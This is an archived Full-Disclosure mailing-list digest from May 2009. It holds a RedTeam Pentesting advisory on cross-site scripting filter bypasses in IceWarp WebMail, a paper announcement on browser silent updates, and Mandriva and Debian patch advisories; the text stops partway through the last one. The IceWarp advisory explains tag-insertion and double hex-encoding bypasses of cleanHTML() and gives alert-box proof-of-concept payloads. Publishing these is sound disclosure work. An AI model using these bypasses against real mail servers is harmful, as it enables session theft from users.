http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090505/018ee5fa/attachment.bin From release at redteam-pentesting.de Tue May 5 13:55:06 2009 From: release at redteam-pentesting.de (RedTeam Pentesting GmbH) Date: Tue, 5 May 2009 14:55:06 +0200 Subject: [Full-disclosure] [RT-SA-2009-001] IceWarp WebMail Server: Cross Site Scripting in Email View Message-ID: <20090505125505.GF5763@otis.atalante.redteam-pentesting.de> Advisory: IceWarp WebMail Server: Cross Site Scripting in Email View During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to Cross Site Scripting attacks in its email view. This enables attackers to send emails with embedded JavaScript code, for example, to steal users' session IDs. Details ======= Product: IceWarp eMail Server / WebMail Server Affected Versions: 9.4.1 Fixed Versions: 9.4.2 Vulnerability Type: Cross Site Scripting Security Risk: high Vendor URL: http://www.icewarp.com/ Vendor Status: notified, fixed version released Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2009-001 Advisory Status: published CVE: CVE-2009-1467 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1467 Introduction ============ "Feature complete yet easy to use, WebMail Server Pro provides feature rich Web 2.0 web-based access to email, calendars, contacts, files and shared data from any computer with browser and internet connection, without the usual configuration hassle. Thanks to advanced technologies and application-like look and feel, Pro suggests it was born to become the ultimate replacement of Outlook and similar desktop mail clients." (from the vendor's homepage) More Details ============ To prevent the execution of JavaScript and VBScript code in HTML emails and to remove unwanted HTML tags, the IceWarp WebMail Server filters HTML emails with the function cleanHTML() that is defined in the PHP file html/webmail/server/inc/tools.php This filtering function can be circumvented in various ways, to still allow XSS to happen. Tag Removal ----------- Beginning in line 462 down to line 482, the cleanHTML() function removes or changes a variety of keywords which are considered malicious. This includes the removal of all attributes starting with "on" (e.g. onmouseover, onload etc.) and the rewriting of the words "javascript" and "vbscript" to "noscript". Later, in line 485, the cleanHTML() function completely removes various HTML tags from the email: $string = preg_replace('#]*>#i',"",$string); By inserting one of these HTML tags, which gets removed by the filtering function, between the keywords which get filtered before, the cleanHTML() function will not recognize them anymore. Later, it will remove the HTML tag and thereby make the keyword valid again. Proof of Concept Tag Removal ---------------------------- An HTML email with the following content will open an alert box in victims' browsers when they move the mouse over the "XSS" text of the
tag:
nmouseover="alert('XSS')";>XSS
This circumvention should work in all recent browsers with JavaScript support, during the penetration test Firefox 3.x was used. Hex Encoding ------------ Another way to circumvent the filtering is to use hex-encoded HTML entities. The character "j" can e.g. be encoded as "j". The cleanHTML() function decodes the given string once in line 459: $string = html_entity_decode($string, ENT_COMPAT, "UTF-8"); By double encoding the input, all regular expressions used for filtering will fail to recognize malicious content even after the first decoding. The effect of this vulnerability is limited by the fact that HTML encoded entities are recognized by browsers only if they are part of a text node or attribute values. Proof of Concept Hex Encoding ----------------------------- The "src" attribute value of the HTML tag can be double encoded as This will be decoded by the html_entity_decode() function in line 459 to the string The value of the "src" attribute will not be recognized by the filtering attempts following the decoding in the cleanHTML() function. A message with such an image tag in the body will trigger the JavaScript and open a popup box if the browser supports "javascript:" attribute values in image elements' "src" attributes. This particular proof of concept works with Internet Explorer 6, the newest Firefox will not execute the JavaScript. Workaround ========== Users can disable the HTML message view in their configuration, so emails are only displayed as plaintext. Fix === Upgrade to version 9.4.2. Security Risk ============= The risk of this vulnerability is estimated as high. Attackers have the possibility to execute arbitrary JavaScript code in users' browsers and are thereby able to steal, for example, the users' session IDs. Users also cannot disallow JavaScript, as it is needed by the application itself to work properly. History ======= 2009-03-23 Vulnerabilities identified during a penetration test 2009-04-01 Meeting with customer and vendor 2009-04-28 CVE number assigned 2009-05-05 Vendor publishes fixed version 2009-05-05 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 Gesch?ftsf?hrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090505/e1798d7b/attachment.bin From stefan.frei at techzoom.net Tue May 5 21:54:41 2009 From: stefan.frei at techzoom.net (Stefan Frei) Date: Tue, 5 May 2009 22:54:41 +0200 Subject: [Full-disclosure] New Browser Security Paper: Why Silent Updates Boost Security Message-ID: Dear all, with research colleague Thomas Duebendorfer from Google in Zurich I've finally had a chance to look deeper into the performance of Web browser update mechanisms. The analysis of anonymized Google Web server logs allowed us to compare and rank the update strategies deployed by Google Chrome, Mozilla Firefox, Apple Safari, and Opera. We found considerable differences in the performance of the update techniques deployed by each browser by measuring the share of the latest minor version within the same major version during the first 21 days after its release. Chrome topped with 97% share after 21 days, followed by Firefox 85%, Safari 53%, and Opera 24%. However, during the first 5 days after a new release Firefox outperformed all the others. The paper discusses the findings and provides empirical data to evaluate different update strategies. Paper: Why Silent Updates Boost Security Abstract: In this paper we analyze the effectiveness of different Web browsers update mechanisms; from Google Chrome's silent update mechanism to Opera's update requiring a full re-installation. We use anonymized logs from Google's world wide distributed Web servers. An analysis of the logged HTTP user-agent strings that Web browsers report when requesting any Web page is used to measure the daily browser version shares in active use. Our measurements prove that silent updates and little dependency on the underlying operating system are most effective to get users of Web browsers to surf the Web with the latest browser version. However, there is still room for improvement as we found. Google Chrome's advantageous silent update mechanism has been open sourced in April 2009. We recommend any software vendor to seriously consider deploying silent updates as this benefits both the vendor and the user, especially for widely used attack-exposed applications like Web browsers and browser plug-ins. Authors: - Thomas Duebendorfer, Google Switzerland GmbH - Stefan Frei, Communication Systems Group, ETH Zurich, Switzerland Paper Download: http://www.techzoom.net/silent-updates Paper Blog http://blog.techzoom.net/2009/05/silent-updates-vs-loss-of-control.html Cheers Stefan Frei & Thomas Duebendorfer From security at mandriva.com Tue May 5 23:02:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Wed, 06 May 2009 00:02:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:106 ] libwmf Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:106 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libwmf Date : May 5, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Use-after-free vulnerability in the embedded GD library in libwmf 0.2.8.4 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WMF file (CVE-2009-1364). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1364 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 2d342dc40ab150992cf1a8a6621fab7f 2008.1/i586/libwmf0.2_7-0.2.8.4-16.1mdv2008.1.i586.rpm 7a0521fbdf9a6da2bffbf12aebf1715f 2008.1/i586/libwmf0.2_7-devel-0.2.8.4-16.1mdv2008.1.i586.rpm ba695656e60503bda08f70c925b8330e 2008.1/i586/libwmf-0.2.8.4-16.1mdv2008.1.i586.rpm 322e036dea7ba8140a18824005d9b92a 2008.1/SRPMS/libwmf-0.2.8.4-16.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 459bad68ba0653eb1bc6780e77751a93 2008.1/x86_64/lib64wmf0.2_7-0.2.8.4-16.1mdv2008.1.x86_64.rpm 8618459d455aadfd73b92aed90b9cfe5 2008.1/x86_64/lib64wmf0.2_7-devel-0.2.8.4-16.1mdv2008.1.x86_64.rpm 2cde8c262a9d16e137d138c59cfd9e8b 2008.1/x86_64/libwmf-0.2.8.4-16.1mdv2008.1.x86_64.rpm 322e036dea7ba8140a18824005d9b92a 2008.1/SRPMS/libwmf-0.2.8.4-16.1mdv2008.1.src.rpm Mandriva Linux 2009.0: e2b9bedbeb985a3c99006bba788934e9 2009.0/i586/libwmf0.2_7-0.2.8.4-17.1mdv2009.0.i586.rpm 13d8a396ce0df792b8e4969cb9cde254 2009.0/i586/libwmf0.2_7-devel-0.2.8.4-17.1mdv2009.0.i586.rpm e71c42640bb10178a89169c8248dd01b 2009.0/i586/libwmf-0.2.8.4-17.1mdv2009.0.i586.rpm 59ff2c3574addc0a81bb6796c81904d3 2009.0/SRPMS/libwmf-0.2.8.4-17.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: f7cff966df6cf93f609cac9a6b3696e5 2009.0/x86_64/lib64wmf0.2_7-0.2.8.4-17.1mdv2009.0.x86_64.rpm 2da8139058b46db4b2745aaec2ce02a5 2009.0/x86_64/lib64wmf0.2_7-devel-0.2.8.4-17.1mdv2009.0.x86_64.rpm 518fd614057faf6d0f3e29ad0e7c7fa7 2009.0/x86_64/libwmf-0.2.8.4-17.1mdv2009.0.x86_64.rpm 59ff2c3574addc0a81bb6796c81904d3 2009.0/SRPMS/libwmf-0.2.8.4-17.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 6d180eab4e408273366ae5f093f1677c 2009.1/i586/libwmf0.2_7-0.2.8.4-17.1mdv2009.1.i586.rpm 81f66bafa0a33afea19102cfe2706534 2009.1/i586/libwmf0.2_7-devel-0.2.8.4-17.1mdv2009.1.i586.rpm 5d11c53dd0edd170621fc35ca508a9ce 2009.1/i586/libwmf-0.2.8.4-17.1mdv2009.1.i586.rpm 5f3069da8567b287d51b2a8376f2e4bf 2009.1/SRPMS/libwmf-0.2.8.4-17.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 5ccf282d020f5a79c5fda7e2c7d1230e 2009.1/x86_64/lib64wmf0.2_7-0.2.8.4-17.1mdv2009.1.x86_64.rpm 43c1cc09b1d6aa8a1be1270a92f177e2 2009.1/x86_64/lib64wmf0.2_7-devel-0.2.8.4-17.1mdv2009.1.x86_64.rpm e60fb7a8cfc492b48946184d2981b6ef 2009.1/x86_64/libwmf-0.2.8.4-17.1mdv2009.1.x86_64.rpm 5f3069da8567b287d51b2a8376f2e4bf 2009.1/SRPMS/libwmf-0.2.8.4-17.1mdv2009.1.src.rpm Corporate 3.0: 56348848bcbdeea3b3392c6e6eb50aa9 corporate/3.0/i586/libwmf0.2_7-0.2.8-6.6.C30mdk.i586.rpm b03ca678d92bf48fce95f0afdfdd98b5 corporate/3.0/i586/libwmf0.2_7-devel-0.2.8-6.6.C30mdk.i586.rpm a3e45d91ca75b796115b15a1e299e43e corporate/3.0/i586/libwmf-0.2.8-6.6.C30mdk.i586.rpm fb1a17a5e64ba156b386a94cbbc52355 corporate/3.0/SRPMS/libwmf-0.2.8-6.6.C30mdk.src.rpm Corporate 3.0/X86_64: 54cd23ce8d40499970f26dbd841ab8a6 corporate/3.0/x86_64/lib64wmf0.2_7-0.2.8-6.6.C30mdk.x86_64.rpm 089cadda8c879d3e4aed68e4b0feccd4 corporate/3.0/x86_64/lib64wmf0.2_7-devel-0.2.8-6.6.C30mdk.x86_64.rpm adbfbafa64eeb734f21fc8f8483c2f7b corporate/3.0/x86_64/libwmf-0.2.8-6.6.C30mdk.x86_64.rpm fb1a17a5e64ba156b386a94cbbc52355 corporate/3.0/SRPMS/libwmf-0.2.8-6.6.C30mdk.src.rpm Corporate 4.0: 48a7c42b8e4bd5465ce3acb4e2f03d19 corporate/4.0/i586/libwmf0.2_7-0.2.8.3-6.6.20060mlcs4.i586.rpm ee957f0a4c3fe69d50aa2b8ce9bad619 corporate/4.0/i586/libwmf0.2_7-devel-0.2.8.3-6.6.20060mlcs4.i586.rpm d99ed07d9087627101ec3a6bfc8ddf13 corporate/4.0/i586/libwmf-0.2.8.3-6.6.20060mlcs4.i586.rpm a1c9970e6f7317d4776decc4f4b02665 corporate/4.0/SRPMS/libwmf-0.2.8.3-6.6.20060mlcs4.src.rpm Corporate 4.0/X86_64: be0efb665fb41259f3e49db45bf86bf7 corporate/4.0/x86_64/lib64wmf0.2_7-0.2.8.3-6.6.20060mlcs4.x86_64.rpm 9f199425e1d97dd0d7b5c50f40316baa corporate/4.0/x86_64/lib64wmf0.2_7-devel-0.2.8.3-6.6.20060mlcs4.x86_64.rpm 576d6e1efd6b83ea226a2ad656a71f04 corporate/4.0/x86_64/libwmf-0.2.8.3-6.6.20060mlcs4.x86_64.rpm a1c9970e6f7317d4776decc4f4b02665 corporate/4.0/SRPMS/libwmf-0.2.8.3-6.6.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKAIpfmqjQ0CJFipgRAl/bAJ0fCNQ4BMjoTrJisl5ISSH/iVfBJACgiCNf WpHdeUhRY1FcZ+dRrYMBm6o= =iHYX -----END PGP SIGNATURE----- From noahm at debian.org Tue May 5 21:05:20 2009 From: noahm at debian.org (Noah Meyerhans) Date: Tue, 05 May 2009 20:05:20 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1790-1] New xpdf packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1790-1 security at debian.org http://www.debian.org/security/ Noah Meyerhans May 05, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : xpdf Vulnerability : multiple Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2009-0146 CVE-2009-0147 CVE-2009-0165 CVE-2009-0166 CVE-2009-0799 CVE-2009-0800 CVE-2009-1179 CVE-2009-1180 CVE-2009-1181 CVE-2009-1182 CVE-2009-1183 Debian Bug : 524809 Several vulnerabilities have been identified in xpdf, a suite of tools for viewing and converting Portable Document Format (PDF) files. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-0146 Multiple buffer overflows in the JBIG2 decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, and other products allow remote attackers to cause a denial of service (crash) via a crafted PDF file, related to (1) JBIG2SymbolDict::setBitmap and (2) JBIG2Stream::readSymbolDictSeg. CVE-2009-0147 Multiple integer overflows in the JBIG2 decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, and other products allow remote attackers to cause a denial of service (crash) via a crafted PDF file, related to (1) JBIG2Stream::readSymbolDictSeg, (2) JBIG2Stream::readSymbolDictSeg, and (3) JBIG2Stream::readGenericBitmap. CVE-2009-0165 Integer overflow in the JBIG2 decoder in Xpdf 3.02pl2 and earlier, as used in Poppler and other products, when running on Mac OS X, has unspecified impact, related to "g*allocn." CVE-2009-0166 The JBIG2 decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, and other products allows remote attackers to cause a denial of service (crash) via a crafted PDF file that triggers a free of uninitialized memory. CVE-2009-0799 The JBIG2 decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, Poppler before 0.10.6, and other products allows remote attackers to cause a denial of service (crash) via a crafted PDF file that triggers an out-of-bounds read. CVE-2009-0800 Multiple "input validation flaws" in the JBIG2 decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, Poppler before 0.10.6, and other products allow remote attackers to execute arbitrary code via a crafted PDF file. CVE-2009-1179 Integer overflow in the JBIG2 decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, Poppler before 0.10.6, and other products allows remote attackers to execute arbitrary code via a crafted PDF file. CVE-2009-1180 The JBIG2 decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, Poppler before 0.10.6, and other products allows remote attackers to execute arbitrary code via a crafted PDF file that triggers a free of invalid data. CVE-2009-1181 The JBIG2 decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, Poppler before 0.10.6, and other products allows remote attackers to cause a denial of service (crash) via a crafted PDF file that triggers a NULL pointer dereference. CVE-2009-1182 Multiple buffer overflows in the JBIG2 MMR decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, Poppler before 0.10.6, and other products allow remote attackers to execute arbitrary code via a crafted PDF file. CVE-2009-1183 The JBIG2 MMR decoder in Xpdf 3.02pl2 and earlier, CUPS 1.3.9 and earlier, Poppler before 0.10.6, and other products allows remote attackers to cause a denial of service (infinite loop and hang) via a crafted PDF file. For the old stable distribution (etch), these problems have been fixed in version 3.01-9.1+etch6. For the stable distribution (lenny), these problems have been fixed in version 3.02-1.4+lenny1. For the unstable distribution (sid), these problems will be fixed in a forthcoming version. We recommend that you upgrade your xpdf packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch6.dsc Size/MD5 checksum: 974 9c04059981f8b036d7e6e39c7f0aeb21 http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch6.diff.gz Size/MD5 checksum: 46835 c69a67b9ff487403e7c3ff819c6ff734 http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01.orig.tar.gz Size/MD5 checksum: 599778 e004c69c7dddef165d768b1362b44268 Architecture independent packages: http://security.debian.org/pool/updates/main/x/xpdf/xpdf-common_3.01-9.1+etch6_all.deb Size/MD5 checksum: 62834 dd8f37161c3b2430cb1cd65c911e9f86 http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch6_all.deb Size/MD5 checksum: 1278 d6da8e00b02ab3f17ec44b90fff6bb30 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_alpha.deb Size/MD5 checksum: 920352 83b7d74d9ebae9b26da91de7c91d3502 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_alpha.deb Size/MD5 checksum: 1687294 9862913548fff9bfda37a6fe075df5b0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_amd64.deb Size/MD5 checksum: 809202 171520d7642019943bfe7166876f5da5 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_amd64.deb Size/MD5 checksum: 1493308 9575f135e9ec312f9e6d7d2517dd8f5b arm architecture (ARM) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_arm.deb Size/MD5 checksum: 803714 6db06ffcba7f6d7576ed356e7989557d http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_arm.deb Size/MD5 checksum: 1468616 9afde01dda379acd4e7edfbccc7c7b2d hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_hppa.deb Size/MD5 checksum: 1773794 c9012a9d3919ec40dcea1264ac27a6fe http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_hppa.deb Size/MD5 checksum: 963060 565daaf6f15ff7593d560ef7a2f94364 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_i386.deb Size/MD5 checksum: 796992 5270bef04f1c2e924b813dffe6050d89 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_i386.deb Size/MD5 checksum: 1458826 b2f3cbaac0ffcce0bb8d7e656bf11b02 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_ia64.deb Size/MD5 checksum: 1217142 afeaf9bfc66ebb69767703bfb30bbd4c http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_ia64.deb Size/MD5 checksum: 2218472 6545e9b6f58a84c0daa76baa8a0db629 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_mipsel.deb Size/MD5 checksum: 946638 5323268be89e54c5c8eb7ae13f0eab14 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_mipsel.deb Size/MD5 checksum: 1721268 0b710c0bcc6ffefe29f683ab09d3cbe8 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_powerpc.deb Size/MD5 checksum: 1554798 eadd6236b778761086d436dd8db986e4 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_powerpc.deb Size/MD5 checksum: 849204 d22f5d59f03d6484e149d7536a25a517 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_s390.deb Size/MD5 checksum: 1401814 0e3f588c64e8fa9a102ebcae29c4d807 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_s390.deb Size/MD5 checksum: 767392 4b7c1a868f2f909c2dce25087da77817 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch6_sparc.deb Size/MD5 checksum: 1394680 8b17e2339e2a908a610271eb678495b1 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch6_sparc.deb Size/MD5 checksum: 763618 f3897333018702ee926e41ca5f58dc92 Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.02-1.4+lenny1.dsc Size/MD5 checksum: 1266 faeebc4dfc74129ca708a6345bb483f7 http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.02.orig.tar.gz Size/MD5 checksum: 674912 599dc4cc65a07ee868cf92a667a913d2 http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.02-1.4+lenny1.diff.gz Size/MD5 checksum: 42280 362f72e95494f51a19eeb898b9a527ac Architecture independent packages: http://security.debian.org/pool/updates/main/x/xpdf/xpdf-common_3.02-1.4+lenny1_all.deb Size/MD5 checksum: 67664 b5f063bf32cbeaf1aaeec315dc8aff0a http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.02-1.4+lenny1_all.deb Size/MD5 checksum: 1268 f67780458dac3c38cd59bfde186f9a3b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_alpha.deb Size/MD5 checksum: 1896344 f65f591413c25a23ea2aaccba2b5b634 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_alpha.deb Size/MD5 checksum: 1018434 cb679c93bbc428ea852bd4ef3103e42d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_amd64.deb Size/MD5 checksum: 1709514 1e1277251a6dd0bb0a551997efd39175 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_amd64.deb Size/MD5 checksum: 921892 fb7de1db5e3885365c3ad74c3646ab57 arm architecture (ARM) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_arm.deb Size/MD5 checksum: 1667088 58ddefe40598d6fe4a5016145163ef45 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_arm.deb Size/MD5 checksum: 907908 881594298fe547cefa3d528c519d369f armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_armel.deb Size/MD5 checksum: 886242 51d55f7c4de41c5d4051f41fde9b7389 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_armel.deb Size/MD5 checksum: 1602392 bc996edfad6d1995cb4ef2f4c7760b51 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_hppa.deb Size/MD5 checksum: 1076286 fa3ac4a1001abf3e892bb1397b06ff17 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_hppa.deb Size/MD5 checksum: 1985520 e95263d094e2c8d6aa72ee1edb9105f3 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_i386.deb Size/MD5 checksum: 876656 441042932886fa29adae731338f6b5bd http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_i386.deb Size/MD5 checksum: 1611730 52516381da25dbb0c1145e2b7cdf692a ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_ia64.deb Size/MD5 checksum: 1380222 0ffaee560534c9d69df433340679c8fc http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_ia64.deb Size/MD5 checksum: 2519970 eb4f4e5c173557fa8ae713f123cbb193 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_mips.deb Size/MD5 checksum: 1894924 58b336b114ef5c8fb9fc6244411b4cf4 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_mips.deb Size/MD5 checksum: 1040834 ae8ed06ea2ed07e3a064c6bd28e80933 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_mipsel.deb Size/MD5 checksum: 1026954 eac8167230b8fa208cdbc5b196f0c624 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_mipsel.deb Size/MD5 checksum: 1872050 8f2e99ce5a102d099ba22543f246d5bd powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_powerpc.deb Size/MD5 checksum: 1788584 7d1466cc8770bd92f299c1cc772f64e7 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_powerpc.deb Size/MD5 checksum: 968838 7cc8568d6b74348300066e42b27f90c2 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_s390.deb Size/MD5 checksum: 871666 1dde93a4cc0a28b90f92c05f0d181079 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_s390.deb Size/MD5 checksum: 1598270 201ad07e4853843dce22f22daa41fd35 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.02-1.4+lenny1_sparc.deb Size/MD5 checksum: 863662 446f2d8fe6483d3741648c4db1ff5b82 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.02-1.4+lenny1_sparc.deb Size/MD5 checksum: 1586262 52861c00f406c35db8a6e6f3269cc37d These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKAJvfYrVLjBFATsMRAvL3AJ48hk1Vsp4ZvDGoQfwOunErKHxElQCfepN+ rFYyqIcPRzz8zBGVGObkTr8= =xhzW -----END PGP SIGNATURE----- From white at debian.org Wed May 6 12:41:28 2009 From: white at debian.org (Steffen Joeris) Date: Wed, 6 May 2009 21:41:28 +1000 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1791-1] New moin packages fix cross-site scripting Message-ID: <20090506114128.53C428486D2@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1791-1 security at debian.org http://www.debian.org/security/ Steffen Joeris May 06, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : moin Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE ID : CVE-2009-1482 Debian Bug : 526594 It was discovered that the AttachFile action in moin, a python clone of WikiWiki, is prone to cross-site scripting attacks when renaming attachements or performing other sub-actions. For the stable distribution (lenny), this problem has been fixed in version 1.7.1-3+lenny2. The oldstable distribution (etch) is not vulnerable. For the testing (squeeze) distribution and the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your moin packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the 